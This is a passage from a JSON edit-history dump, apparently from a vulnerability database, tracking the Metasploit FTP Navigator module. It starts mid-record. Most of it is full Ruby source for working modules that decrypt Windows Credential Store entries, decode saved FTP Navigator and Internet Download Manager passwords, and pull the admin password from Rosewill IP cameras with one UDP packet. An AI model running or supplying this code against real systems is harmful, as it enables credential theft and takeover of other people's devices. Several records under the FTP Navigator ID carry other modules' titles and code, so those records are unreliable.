\"Error Decrypting\" or cred[\"password\"] == \"unsupported type\"\n print_status(\"Credential sucessfully decrypted for: #{cred[\"targetname\"]}\")\n credentials << cred\n end\n end\n else\n print_status(\"No Credential are available for decryption\")\n end\n return credentials\n end\n\n def run\n creds = get_creds\n #store all data to loot if data returned\n if not creds.empty?\n creds.each do |cred|\n credstr = \"\\t Type: \"\n credstr << cred[\"type\"].to_s\n credstr << \" User: \"\n credstr << cred[\"username\"]\n credstr << \" Password: \"\n credstr << cred[\"password\"]\n print_good(cred[\"targetname\"])\n print_line(credstr)\n #store specific creds to db\n report_db(cred)\n print_line(\"\")\n end\n\n\n print_status(\"Writing all data to loot...\")\n path = store_loot(\n 'credstore.user.creds',\n 'text/plain',\n session,\n creds,\n 'credstore_user_creds.txt',\n 'Microsoft Credential Store Contents')\n print_good(\"Data saved in: #{path}\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-12T08:30:10", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 29}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-12T10:30:05", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 2.3, "vector": "NONE", "modified": "2019-07-12T10:30:05"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1142982530992240834"]}, {"type": "mssecure", "idList": ["MSSECURE:DF5ECFDE7B92D3062255C64F4DCDB60C", "MSSECURE:B42A4FB86A509DBE18B901CDF6623FBE"]}, {"type": "cve", "idList": ["CVE-2014-3798", "CVE-2019-12574", "CVE-2019-10341", "CVE-2019-10342", "CVE-2019-10340", "CVE-2019-10347", "CVE-2019-10351", "CVE-2019-10350", "CVE-2019-10348"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:405733E0E5830C10A5BFD1F510AC6229"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3B22154441E43549CCD59FB21769BA36", "CARBONBLACK:CD92595A18896CE7F1792E03F66EC493"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E59EB8E9EC20422785AE9DAFC61E8EFB", "QUALYSBLOG:5AF9221F26800CBB100A5B0C047EF78A"]}, {"type": "thn", "idList": ["THN:EAB09F3FEA7598A1BB05EECD7C3145B5"]}, {"type": "talosblog", "idList": ["TALOSBLOG:AB37BD3B89808BC17131C9FD653372A8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47105"]}], "modified": "2019-07-12T10:30:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-12T10:30:05", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 30}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "9195671f01519eb51decde113687aac0", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather Internet Download Manager (IDM) Password Extractor", "description": "This module recovers the saved premium download account passwords from Internet Download Manager (IDM). These passwords are stored in an encoded format in the registry. This module traverses through these registry entries and decodes them. Thanks to the template code of theLightCosine's CoreFTP password module.\n", "published": "2011-08-10T17:48:30", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-12T14:28:59", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 2.3, "vector": "NONE", "modified": "2019-07-12T10:30:05"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1142982530992240834"]}, {"type": "mssecure", "idList": ["MSSECURE:DF5ECFDE7B92D3062255C64F4DCDB60C", "MSSECURE:B42A4FB86A509DBE18B901CDF6623FBE"]}, {"type": "cve", "idList": ["CVE-2014-3798", "CVE-2019-12574", "CVE-2019-10341", "CVE-2019-10342", "CVE-2019-10340", "CVE-2019-10347", "CVE-2019-10351", "CVE-2019-10350", "CVE-2019-10348"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:405733E0E5830C10A5BFD1F510AC6229"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3B22154441E43549CCD59FB21769BA36", "CARBONBLACK:CD92595A18896CE7F1792E03F66EC493"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E59EB8E9EC20422785AE9DAFC61E8EFB", "QUALYSBLOG:5AF9221F26800CBB100A5B0C047EF78A"]}, {"type": "thn", "idList": ["THN:EAB09F3FEA7598A1BB05EECD7C3145B5"]}, {"type": "talosblog", "idList": ["TALOSBLOG:AB37BD3B89808BC17131C9FD653372A8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47105"]}], "modified": "2019-07-12T10:30:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/idm.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Gather Internet Download Manager (IDM) Password Extractor',\n 'Description' => %q{\n This module recovers the saved premium download account passwords from\n Internet Download Manager (IDM). These passwords are stored in an encoded\n format in the registry. This module traverses through these registry entries\n and decodes them. Thanks to the template code of theLightCosine's CoreFTP\n password module.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',\n 'Unknown', # SecurityXploded Team, www.SecurityXploded.com\n ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n creds = Rex::Text::Table.new(\n 'Header' => 'Internet Downloader Manager Credentials',\n 'Indent' => 1,\n 'Columns' =>\n [\n 'User',\n 'Password',\n 'Site'\n ]\n )\n\n registry_enumkeys('HKU').each do |k|\n next unless k.include? \"S-1-5-21\"\n next if k.include? \"_Classes\"\n\n print_status(\"Looking at Key #{k}\")\n\n begin\n subkeys = registry_enumkeys(\"HKU\\\\#{k}\\\\Software\\\\DownloadManager\\\\Passwords\\\\\")\n if subkeys.nil? or subkeys.empty?\n print_status(\"IDM not installed for this user.\")\n return\n end\n\n subkeys.each do |site|\n user = registry_getvaldata(\"HKU\\\\#{k}\\\\Software\\\\DownloadManager\\\\Passwords\\\\#{site}\", \"User\")\n epass = registry_getvaldata(\"HKU\\\\#{k}\\\\Software\\\\DownloadManager\\\\Passwords\\\\#{site}\", \"EncPassword\")\n next if epass == nil or epass == \"\"\n pass = xor(epass)\n print_good(\"Site: #{site} (User=#{user}, Password=#{pass})\")\n creds << [user, pass, site]\n end\n\n print_status(\"Storing data...\")\n path = store_loot(\n 'idm.user.creds',\n 'text/csv',\n session,\n creds.to_csv,\n 'idm_user_creds.csv',\n 'Internet Download Manager User Credentials'\n )\n print_good(\"IDM user credentials saved in: #{path}\")\n\n rescue ::Exception => e\n print_error(\"An error has occurred: #{e.to_s}\")\n end\n\n end\n end\n\n def xor(ciphertext)\n pass = ciphertext.unpack(\"C*\")\n key=15\n for i in 0 .. pass.length-1 do\n pass[i] ^= key\n end\n return pass.pack(\"C*\")\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-12T14:28:59", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 31}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-12T16:28:08", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 4.2, "vector": "NONE", "modified": "2019-07-12T16:28:08"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:C06ABD15E9BC61371891B2C67564D81C"]}, {"type": "kitploit", "idList": ["KITPLOIT:2921102078549931520", "KITPLOIT:1142982530992240834"]}, {"type": "exploitdb", "idList": ["EDB-ID:47109", "EDB-ID:47111", "EDB-ID:47113"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815247"]}, {"type": "mssecure", "idList": ["MSSECURE:DF5ECFDE7B92D3062255C64F4DCDB60C", "MSSECURE:B42A4FB86A509DBE18B901CDF6623FBE"]}, {"type": "cve", "idList": ["CVE-2019-12574", "CVE-2014-3798", "CVE-2019-10347", "CVE-2019-10351", "CVE-2019-10342", "CVE-2019-10341", "CVE-2019-10340"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:405733E0E5830C10A5BFD1F510AC6229"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3B22154441E43549CCD59FB21769BA36"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E59EB8E9EC20422785AE9DAFC61E8EFB", "QUALYSBLOG:5AF9221F26800CBB100A5B0C047EF78A"]}], "modified": "2019-07-12T16:28:08"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-12T16:28:08", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 32}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "8073905f3ff6fce69bd48d515f2902e2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Rosewill RXS-3211 IP Camera Password Retriever", "description": "This module takes advantage of a protocol design issue with the Rosewill admin executable in order to retrieve passwords, allowing remote attackers to take administrative control over the device. Other similar IP Cameras such as Edimax, Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested. The protocol design issue also allows attackers to reset passwords on the device.\n", "published": "2011-05-25T22:06:51", "modified": "2017-08-27T01:01:10", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-13T10:37:07", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 4.2, "vector": "NONE", "modified": "2019-07-12T16:28:08"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:C06ABD15E9BC61371891B2C67564D81C"]}, {"type": "kitploit", "idList": ["KITPLOIT:2921102078549931520", "KITPLOIT:1142982530992240834"]}, {"type": "exploitdb", "idList": ["EDB-ID:47109", "EDB-ID:47111", "EDB-ID:47113"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815247"]}, {"type": "mssecure", "idList": ["MSSECURE:DF5ECFDE7B92D3062255C64F4DCDB60C", "MSSECURE:B42A4FB86A509DBE18B901CDF6623FBE"]}, {"type": "cve", "idList": ["CVE-2019-12574", "CVE-2014-3798", "CVE-2019-10347", "CVE-2019-10351", "CVE-2019-10342", "CVE-2019-10341", "CVE-2019-10340"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:405733E0E5830C10A5BFD1F510AC6229"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3B22154441E43549CCD59FB21769BA36"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E59EB8E9EC20422785AE9DAFC61E8EFB", "QUALYSBLOG:5AF9221F26800CBB100A5B0C047EF78A"]}], "modified": "2019-07-12T16:28:08"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Udp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Rosewill RXS-3211 IP Camera Password Retriever',\n 'Description' => %q{\n This module takes advantage of a protocol design issue with the Rosewill admin\n executable in order to retrieve passwords, allowing remote attackers to take\n administrative control over the device. Other similar IP Cameras such as Edimax,\n Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested.\n The protocol design issue also allows attackers to reset passwords on the device.\n },\n 'Author' => 'Ben Schmidt',\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::CHOST,\n Opt::RPORT(13364),\n ])\n end\n\n def run_host(ip)\n #Protocol\n target_mac = \"\\xff\\xff\\xff\\xff\\xff\\xff\"\n cmd = \"\\x00\" #Request\n cmd << \"\\x06\\xff\\xf9\" #Type\n\n password = nil\n\n begin\n udp_sock = Rex::Socket::Udp.create( {\n 'LocalHost' => datastore['CHOST'] || nil,\n 'PeerHost' => ip,\n 'PeerPort' => datastore['RPORT'],\n 'Context' =>\n {\n 'Msf' => framework,\n 'MsfExploit' => self\n }\n })\n\n udp_sock.put(target_mac+cmd)\n\n res = udp_sock.recvfrom(65535, 0.5) and res[1]\n\n #Parse the reply if we get a response\n if res\n password = parse_reply(res)\n end\n rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError\n print_error(\"Connection error\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Unknown error: #{e.class} #{e}\")\n ensure\n udp_sock.close if udp_sock\n end\n\n #Store the password if the parser returns something\n if password\n print_good(\"Password retrieved: #{password.to_s}\")\n report_cred(\n ip: rhost,\n port: rport,\n service_name: 'ipcam',\n user: '',\n password: password,\n proof: password\n )\n end\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def parse_reply(pkt)\n @results ||= {}\n\n # Ignore \"empty\" packets\n return nil if not pkt[1]\n\n if(pkt[1] =~ /^::ffff:/)\n pkt[1] = pkt[1].sub(/^::ffff:/, '')\n end\n\n return pkt[0][333,12] if pkt[0][6,4] == \"\\x01\\x06\\xff\\xf9\"\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-13T10:37:07", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 33}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-13T12:31:44", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 2.5, "vector": "NONE", "modified": "2019-07-13T12:31:44"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-5629", "CVE-2019-11242", "CVE-2019-1010310", "CVE-2019-12731"]}, {"type": "threatpost", "idList": ["THREATPOST:92972EAF9D82078A646C89FF655246FA", "THREATPOST:C06ABD15E9BC61371891B2C67564D81C"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:F53A8C2BFF8AC6C4AD7C6CF924817DE9"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:B3340B5F03FCBAB6A052DC882407B265"]}, {"type": "kitploit", "idList": ["KITPLOIT:2921102078549931520", "KITPLOIT:1142982530992240834"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5F182A2A74063A9F68AA389F17A6B662"]}, {"type": "exploitdb", "idList": ["EDB-ID:47109", "EDB-ID:47111", "EDB-ID:47113", "EDB-ID:47115"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153610", "PACKETSTORM:153612"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815247"]}, {"type": "mssecure", "idList": ["MSSECURE:DF5ECFDE7B92D3062255C64F4DCDB60C", "MSSECURE:B42A4FB86A509DBE18B901CDF6623FBE"]}], "modified": "2019-07-13T12:31:44"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-13T12:31:44", "differentElements": ["sourceData"], "edition": 34}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "66445928f8c96e92ff3800c6ff29b8ae", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-15T14:53:27", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2019-07-15T14:53:27"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:608490A0A590CC299429B6FE24BE7DBD", "THREATPOST:10F933A139B9FD2C7011439EB51FFB64", "THREATPOST:92972EAF9D82078A646C89FF655246FA", "THREATPOST:C06ABD15E9BC61371891B2C67564D81C"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7A671AF5DEF93D14EC191CFA8A81BB2D", "MALWAREBYTES:F53A8C2BFF8AC6C4AD7C6CF924817DE9"]}, {"type": "kitploit", "idList": ["KITPLOIT:7430529944893678297", "KITPLOIT:3658235590569284189", "KITPLOIT:2921102078549931520"]}, {"type": "schneier", "idList": ["SCHNEIER:96A2F50F6F033D167626C5A4E1D165EB"]}, {"type": "securelist", "idList": ["SECURELIST:41A276C1D7B9A4839136D9B2BCFEF521"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6"]}, {"type": "exploitdb", "idList": ["EDB-ID:47116", "EDB-ID:47118", "EDB-ID:47120"]}, {"type": "cve", "idList": ["CVE-2019-5629", "CVE-2019-11242", "CVE-2019-1010310", "CVE-2019-12731"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:B3340B5F03FCBAB6A052DC882407B265"]}], "modified": "2019-07-15T14:53:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-15T14:53:27", "differentElements": ["sourceData"], "edition": 35}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-15T16:48:53", "history": [], "viewCount": 15, "enchantments": {"score": {"value": 2.3, "vector": "NONE", "modified": "2019-07-15T16:48:53"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:608490A0A590CC299429B6FE24BE7DBD", "THREATPOST:10F933A139B9FD2C7011439EB51FFB64", "THREATPOST:92972EAF9D82078A646C89FF655246FA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7A671AF5DEF93D14EC191CFA8A81BB2D"]}, {"type": "kitploit", "idList": ["KITPLOIT:7430529944893678297", "KITPLOIT:3658235590569284189"]}, {"type": "schneier", "idList": ["SCHNEIER:96A2F50F6F033D167626C5A4E1D165EB"]}, {"type": "securelist", "idList": ["SECURELIST:41A276C1D7B9A4839136D9B2BCFEF521"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153629", "PACKETSTORM:153635", "PACKETSTORM:153642", "PACKETSTORM:153627"]}, {"type": "exploitdb", "idList": ["EDB-ID:47116", "EDB-ID:47118", "EDB-ID:47120"]}, {"type": "cve", "idList": ["CVE-2019-5629", "CVE-2019-11242", "CVE-2019-1010310", "CVE-2019-12731"]}], "modified": "2019-07-15T16:48:53"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator 